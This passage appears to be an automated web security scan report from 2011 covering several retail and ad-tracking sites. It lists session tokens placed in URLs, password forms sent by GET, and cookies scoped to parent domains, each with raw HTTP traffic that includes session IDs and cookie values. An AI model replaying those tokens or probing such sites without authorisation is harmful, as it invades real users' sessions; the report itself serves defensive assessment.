Host:	http://www.bluefly.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.bluefly.com/cart/cart.jsp;jsessionid=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12
http://www.bluefly.com/custom/custom.jsp;jsessionid=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12?promoId=m480129
http://www.bluefly.com/myfly/login.jsp;jsessionid=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12

Request

GET / HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSLB=1; SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSRT=6YPQTQA; SSOD=AGHw_gAA

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:31 GMT
Set-Cookie: SSLB=1; path=/; domain=.bluefly.com
Set-Cookie: SSRT=e4XQTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:01:31 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP06 (build: SVNTag=JBPAPP_4_3_0_GA_CP06 date=200907141446)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yLERDUy1DU1IvOS4yLFNlcnZpY2UvOS4yLENBRi85LjIgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wICBd
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 01 Oct 2010 19:42:13 GMT
Pragma: no-cache
Set-Cookie: TLTHID=6B1BA5627F60107F23AEA0F517B78A48; Path=/; Domain=.bluefly.com
Set-Cookie: TLTSID=6B1BA5627F60107F23AEA0F517B78A48; Path=/; Domain=.bluefly.com
Set-Cookie: JSESSIONID=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12; Path=/
Set-Cookie: _714bc2c9=guest; Expires=Tue, 15-May-2012 02:01:31 GMT; Path=/
Set-Cookie: CS_TRACKER_ID=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12; Expires=Sat, 03-Jun-2079 05:15:38 GMT
RTSS: 1
Set-Cookie: TS18d374=e7c2bf9d5c17e0294f3546cf4c9ad3fb60874fe9f20602d14dd0857b; Path=/
Content-Length: 43592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="ht
...[SNIP]...

Welcome to Bluefly, <a title="login" href="/myfly/login.jsp;jsessionid=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12">login</a> or register
<a title="register" href="/myfly/login.jsp;jsessionid=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12">here</a>
...[SNIP]...
<li id="navCS"><a href="/custom/custom.jsp;jsessionid=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12?promoId=m480129">Customer Service</a>
...[SNIP]...
<div id="navShopBag">
<a title="shopping bag" href="/cart/cart.jsp;jsessionid=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12">
<span id="textShopBag">
...[SNIP]...

10.5. http://www.bluefly.com/myfly/login.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.bluefly.com
Path:	/myfly/login.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.bluefly.com/myfly/login.jsp;jsessionid=ONzgfawlrUIPLStla7ZseA**.bluefly_node4

Request

GET /myfly/login.jsp;jsessionid=ONzgfawlrUIPLStla7ZseA**.bluefly_node4 HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSOD=AGHw_gAA; SSLB=1; SSRT=64PQTQE; TLTHID=7D2A76E47F5F107F24CCB1BBDF37F7B5; TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; JSESSIONID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; _714bc2c9=guest; CS_TRACKER_ID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; __utmb=9200358.1.10.1305510900; cmTPSet=Y; mr_referredVisitor=0; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%5D; TS18d374=f627709e7890e7b2182df7e64b5a37d2dc25568252c8426a4dd083eb; CoreAt=; cmRS=&t1=1305510900223&t2=1305510909795&t3=1305511130583&lti=1305511130581&ln=&hr=/myfly/login.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4&fti=&fn=keyword_search_0%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=core.bluefly.com/cm%3F&ci=90039438

Response

10.6. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.facebook.com/extern/login_status.php?api_key=194699513895760&app_id=194699513895760&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df394caa838%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3c6351cfc%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc3c3701%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df206eae43%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc3c3701&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3c396bb9%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc3c3701&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df39c6acff%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc3c3701&sdk=joey&session_version=3

Request

GET /extern/login_status.php?api_key=194699513895760&app_id=194699513895760&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df394caa838%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3c6351cfc%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc3c3701%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df206eae43%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc3c3701&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3c396bb9%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc3c3701&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df39c6acff%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc3c3701&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=1#cb=f3c396bb9&origin=http%3A%2F%2Fwww.bluenile.com%2Ff315278f74&relation=parent&transport=postmessage&frame=fc3c3701
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.213.67
X-Cnection: close
Date: Mon, 16 May 2011 01:55:47 GMT
Content-Length: 0

10.7. https://www.toshibadirect.com/images/ui5/btn_login.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.toshibadirect.com
Path:	/images/ui5/btn_login.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://www.toshibadirect.com/images/ui5/btn_login.gif?BV_SessionID=@@@@0287336128.1305542699@@@@&BV_EngineID=cccdadfdidkkkjmcgfkceghdgngdglo.0

Request

GET /images/ui5/btn_login.gif?BV_SessionID=@@@@0287336128.1305542699@@@@&BV_EngineID=cccdadfdidkkkjmcgfkceghdgngdglo.0 HTTP/1.1
Host: www.toshibadirect.com
Connection: keep-alive
Referer: https://www.toshibadirect.com/td/b2c/myaccount.to
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1730020066.1305542428@@@@; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:2&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_nr%3D1305511275999%7C1308103275999%3B%20s_vnum%3D1308102050353%2526vn%253D2%7C1308102050353%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%252C%255B'Referrers'%252C'1305542445659'%255D%255D%7C1463395245659%3B%20s_invisit%3Dtrue%7C1305544320370%3B%20omtr_lv%3D1305542520372%7C1400150520372%3B%20omtr_lv_s%3DLess%2520than%25201%2520day%7C1305544320372%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305544320381%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20omtr_eVar49%3DD%253Dc49%3B%20c_m%3Dundefinedburpburp%3B%20s_sq%3D%3B%20s_ppv%3D32%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:45:30 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Last-Modified: Wed, 04 Jun 2008 16:09:18 GMT
Accept-Ranges: bytes
Content-Length: 945
Cache-Control: max-age=604800
Expires: Mon, 23 May 2011 10:45:30 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89al....e...,..DD.'........).................

.3$..........%%....ED.66..........dd.D&.nc.......::.. ..........+
................l[....PD.......((.+$.JD.9&....H+....GD.0........TT.\\.P4.iR.55....
...[SNIP]...

11. Password field submitted using GET method previous next
There are 12 instances of this issue:

https://ordering.ftd.com/new-signup/
https://ordering.ftd.com/new-signup/
https://ordering.ftd.com/reminder-signin/
https://ordering.ftd.com/reminder-signin/
https://ordering.ftd.com/signin/
https://ordering.ftd.com/signin/
http://shoprunner.force.com/content/JsContentElementsGNC
http://shoprunner.force.com/content/JsContentElementsPET
http://www.ftd.com/
http://www.ftd.com/
http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/
http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

11.1. https://ordering.ftd.com/new-signup/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/new-signup/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

https://ordering.ftd.com/528/signin/

The form contains the following password field:

password

Request

GET /new-signup/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d

Response

11.2. https://ordering.ftd.com/new-signup/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/new-signup/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

https://ordering.ftd.com/528/signin/

The form contains the following password field:

password

Request

Response

11.3. https://ordering.ftd.com/reminder-signin/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/reminder-signin/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

https://ordering.ftd.com/528/signin/

The form contains the following password field:

password

Request

Response

11.4. https://ordering.ftd.com/reminder-signin/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/reminder-signin/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

https://ordering.ftd.com/528/signin/

The form contains the following password field:

password

Request

Response

11.5. https://ordering.ftd.com/signin/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/signin/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

https://ordering.ftd.com/528/signin/

The form contains the following password field:

password

Request

Response

11.6. https://ordering.ftd.com/signin/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/signin/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

https://ordering.ftd.com/528/signin/

The form contains the following password field:

password

Request

Response

11.7. http://shoprunner.force.com/content/JsContentElementsGNC previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://shoprunner.force.com
Path:	/content/JsContentElementsGNC

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://shoprunner.force.com/content/step1

The form contains the following password field:

password2

Request

Response

11.8. http://shoprunner.force.com/content/JsContentElementsPET previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://shoprunner.force.com
Path:	/content/JsContentElementsPET

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://shoprunner.force.com/content/step1

The form contains the following password field:

password2

Request

Response

11.9. http://www.ftd.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ftd.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

https://ordering.ftd.com/528/signin/

The form contains the following password field:

password

Request

Response

11.10. http://www.ftd.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ftd.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

https://ordering.ftd.com/528/signin/

The form contains the following password field:

password

Request

Response

11.11. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ftd.com
Path:	/sweet-shop-ctg/product-sweet-shop/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

https://ordering.ftd.com/528/signin/

The form contains the following password field:

password

Request

Response

11.12. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ftd.com
Path:	/sweet-shop-ctg/product-sweet-shop/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

https://ordering.ftd.com/528/signin/

The form contains the following password field:

password

Request

Response

12. Cookie scoped to parent domain previous next
There are 91 instances of this issue:

http://eval.bizrate.com/js/survey_126457_1.js
http://login.dotomi.com/ucm/UCMController
https://secure.bhphotovideo.com/bnh/controller/home
https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm
https://secure.orientaltrading.com/ui/userProfile/processRequest.do
http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294
http://a.netmng.com/
http://a.rfihub.com/ca.gif
http://a.tribalfusion.com/i.cid
http://action.media6degrees.com/orbserv/hbjs
http://action.media6degrees.com/orbserv/hbpix
http://ad.trafficmp.com/a/bpix
http://ads.adbrite.com/adserver/vdi/684339
http://ads.lfstmedia.com/mark/CRITEO_INCL_US
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://adserver.veruta.com/track.fcgi
http://b.scorecardresearch.com/p
http://cdn.media.bluefly.com/media/templates/images/topnav/bluefly_blue_navi_logo.gif
http://cdn.www.bluefly.com/media/css/custom-theme/bluefly_jqui.css
http://cdn.www.bluefly.com/media/css/mybluefly.css
http://cdn.www.bluefly.com/media/templates/images/myaccount/login-submit.gif
http://cdn.www.bluefly.com/media/templates/images/myaccount/subh-create-account.gif
http://cdn.www.bluefly.com/media/templates/images/myaccount/subh-returning-customers.gif
http://cdn.www.bluefly.com/media/templates/images/myaccount/submit-submit.gif
http://dis.us.criteo.com/dis/dis.aspx
http://html.aggregateknowledge.com/iframe
http://ib.adnxs.com/pxj
http://ib.adnxs.com/seg
http://idcs.interclick.com/Segment.aspx
http://image2.pubmatic.com/AdServer/Pug
http://leadback.advertising.com/adcedge/lb
http://media.fastclick.net/w/tre
http://media.gnc.com/ipixel
http://media.gsimedia.net/ipixel
http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s01194140000734
http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s35472931402100
http://metrics.petsmart.com/b/ss/gsicpet/1/H.20.3/s38054509394851
http://o.toshibadirect.com/b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s3167527708356
https://ordering.ftd.com/reminder-signin/
https://ordering.ftd.com/signin/
https://ordering.ftd.com/signin/
http://phoenix.untd.com/TRCK/RGST
http://pix04.revsci.net/D05509/b3/0/3/noscript.gif
http://pixel.fetchback.com/serve/fb/pdc
http://pixel.fetchback.com/serve/fb/ver
http://pixel.mathtag.com/data/img
http://pixel.mathtag.com/event/img
http://pixel.rubiconproject.com/tap.php
http://pixel.traveladvertising.com/Live/Pixel.aspx
http://px.steelhousemedia.com/pr
http://px.steelhousemedia.com/st
http://r.turn.com/r/beacon
http://rya.rockyou.com/ams/ptrck.php
http://s.xp1.ru4.com/meta
http://sales.liveperson.net/hc/1402662/
http://sales.liveperson.net/hc/46281118/
http://sales.liveperson.net/hc/53965383/
http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/blue-nile-15026564.png
https://secure.bluenile.com/accounts/account-sign-in.html
http://segment-pixel.invitemedia.com/pixel
http://srv.clickfuse.com/pixels/create.php
http://srv2.wa.marketingsolutions.yahoo.com/script/ScriptServlet
http://sync.mathtag.com/sync/img
http://t.p.mybuys.com/webrec/wr.do
http://tags.mediaforge.com/if/50
http://tracking.searchmarketing.com/welcome.asp
http://uat.netmng.com/pixel/
http://www.bluefly.com/
http://www.bluefly.com/myfly/forgot_password.jsp
http://www.bluefly.com/myfly/login.jsp
http://www.bluenile.com/
http://www.bluenile.com/build-your-own-diamond-ring
http://www.bluenile.com/channel-recommendations.html
http://www.bluenile.com/fbc/setStatus.html
http://www.footlocker.com/
http://www.footlocker.com/login/login.cfm
http://www.footlocker.com/login/login_forgotpassword.cfm
http://www.footlocker.com/login/login_form.cfm
https://www.footlocker.com/account/default.cfm
https://www.footlocker.com/account/default/
http://www.imiclk.com/cgi/r.cgi
http://www.linkedin.com/companyInsider
http://www.petco.com/
http://www22.glam.com/cTagsImgCmd.act

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

12.1. http://eval.bizrate.com/js/survey_126457_1.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://eval.bizrate.com
Path:	/js/survey_126457_1.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

sessionid=720232510841276994; Domain=.bizrate.com; Expires=Tue, 17-May-2011 01:54:05 GMT; Path=/
br=13055101949906417201602020302001211; Domain=.bizrate.com; Expires=Thu, 13-May-2021 01:54:05 GMT; Path=/
_data=_time%3A%3Astart_time%3D1305510194%3Btimestamp%3D1305510845%7Ctracker%3A%3Ahtcnt%3D2%3Brf%3Dsur; Domain=.bizrate.com; Expires=Tue, 17-May-2011 01:54:05 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/survey_126457_1.js HTTP/1.1
Host: eval.bizrate.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=720232510841276994; br=13055101949906417201602020302001211; _data=_time%3A%3Astart_time%3D1305510194%3Btimestamp%3D1305510194%7Ctracker%3A%3Ahtcnt%3D1%3Brf%3Dsur

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NON DSP ADM DEV PSD CUSo OUR IND STP PRE NAV UNI"
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: sessionid=720232510841276994; Domain=.bizrate.com; Expires=Tue, 17-May-2011 01:54:05 GMT; Path=/
Set-Cookie: br=13055101949906417201602020302001211; Domain=.bizrate.com; Expires=Thu, 13-May-2021 01:54:05 GMT; Path=/
Set-Cookie: _data=_time%3A%3Astart_time%3D1305510194%3Btimestamp%3D1305510845%7Ctracker%3A%3Ahtcnt%3D2%3Brf%3Dsur; Domain=.bizrate.com; Expires=Tue, 17-May-2011 01:54:05 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Mon, 16 May 2011 01:54:04 GMT
Content-Length: 16130

<!-- // hide script
var BIZRATE = {
init:function() {
this.mid = '126457';
this.type = 1;
if (typeof(this.type) != 'undefined' && this.type > 0 && this.type <= 3) {

...[SNIP]...

12.2. http://login.dotomi.com/ucm/UCMController previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://login.dotomi.com
Path:	/ucm/UCMController

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DotomiSession_2223=2_371600731220825851$330100732990473967$335422886$1305511219021; Domain=.dotomi.com; Path=/
DotomiUser=330100732990473967$0$335422886; Domain=.dotomi.com; Expires=Wed, 15-May-2013 02:00:19 GMT; Path=/
DotomiNet=2$DjQqblZ1RXdFAmBdAgpyVAJHKDNEGQNFC15tVlFJZnhgewkJDQBKXRZSBwIZJRQWJA1ZfmhgWnZRIgFAaV0%3D; Domain=.dotomi.com; Expires=Wed, 15-May-2013 02:00:19 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2223&dtm_cmagic=04048a&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_department=&dtmc_category=Home&dtmc_sub_category=&dtmc_brand=&dtmc_gender=&dtmc_team=&dtmc_product_id=&dtmc_prod_img=&dtmc_loc=http%3A//www.footlocker.com/&dtmc_cg=HOME%3AHome%3ATechnicalProperties&dtmc_source=&dtmc_matchback_id=31176371511204337200580613&dtmc_ref= HTTP/1.1
Host: login.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1305509455494172; DotomiUser=330100732990473967$0$335422886; DotomiSession_2223=2_371600731220825851$330100732990473967$335422886$1305510236018; DotomiNet=2$DjQqblZ1RXdFAmddAAR7XAZHKSpAJ24SQR0PVVBLY3Jma1xARWZBXQAFW0dLSkdZYmFbf2xjVnBRIgFAaV0%3D

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:18 GMT
X-Name: dmc-o01
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Set-Cookie: DotomiUser=330100732990473967$0$335422886; Domain=.dotomi.com; Expires=Wed, 15-May-2013 02:00:19 GMT; Path=/
Set-Cookie: DotomiSession_2223=2_371600731220825851$330100732990473967$335422886$1305511219021; Domain=.dotomi.com; Path=/
